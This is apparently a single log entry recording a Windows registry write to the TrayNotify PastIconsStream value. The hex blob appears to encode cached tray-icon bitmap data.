Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001001800000014000000494c200618002400280010001000ffffffff2110ffffffffffffffff424d360000000000000036000000280000001000000040020000010020000000000000900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf3030303000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040404040a0a0a0a0f0f0f0f0ffffffff9f9f9f9f0000000090909090ffffffffffffffffffffffff9090909000000000000000000000000010101010b0b0b0b0f0f0f0f0b8b8b8b8f3f3f3f32f2f2f2f0303030390909090f0f0f0f07070707030303030a6a6a6a6f9f9f9f9909090900000000010101010d0d0d0d0b0b0b0b01f1f1f1ff0f0f0f0404040400000000000000000ffffffff707070700000000060606060ffffffffa6a6a6a6ffffffff00000000b0b0b0b0b0b0b0b00000000060606060d0d0d0d0000000000000000000000000ffffffff3030303060606060ffffffff6060606040404040ffffffff40404040f0f0f0f01010101000000000a0a0a0a070707070000000000000000000000000ffffffff9c9c9c9cffffffff606060600000000070707070ffffffffb8b8b8b8fffffffffffffffffffffffffffffffffffffffffffffffffbfbfbfb0f0f0f0f90909090f9f9f9f9a6a6a6a64040404070707070f0f0f0f090909090e0e0e0e0303030300000000000000000ffffffff101010100000000000000000000000000000000090909090ffffffffffffffffffffffff9090909000000000ffffffff000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000009f9f9f9fffffffff000000000000000000000000ffffffff000000000000000000000000000000000000000000000000efefefef000000000000000000000000ffffffffe0e0e0e0303030300000000000000000ffffffff101010100000000000000000000000000000000010101010ffffffff000000000000000030303030e0e0e0e0b8b8b8b8ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffb8b8b8b840404040f0f0f0f01010101000000000a0a0a0a0707070700000000000000000000000000000000070707070a0a0a0a00000000010101010f0f0f0f04040404000000000b0b0b0b0b0b0b0b00000000060606060d0d0d0d000000000000000000000000000000000d0d0d0d06060606000000000b0b0b0b0b0b0b0b0000000000000000010101010d0d0d0d0b0b0b0b01f1f1f1ff0f0f0f040404040000000000000000040404040f0f0f0f01f1f1f1fb0b0b0b0d0d0d0d01010101000000000000000000000000010101010b0b0b0b0f0f0f0f0b8b8b8b8f3f3f3f33030303030303030f3f3f3f3b8b8b8b8f0f0f0f0b0b0b0b01010101000000000000000000000000000000000000000000000000040404040a0a0a0a0f0f0f0f0fffffffffffffffff0f0f0f0a0a0a0a040404040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff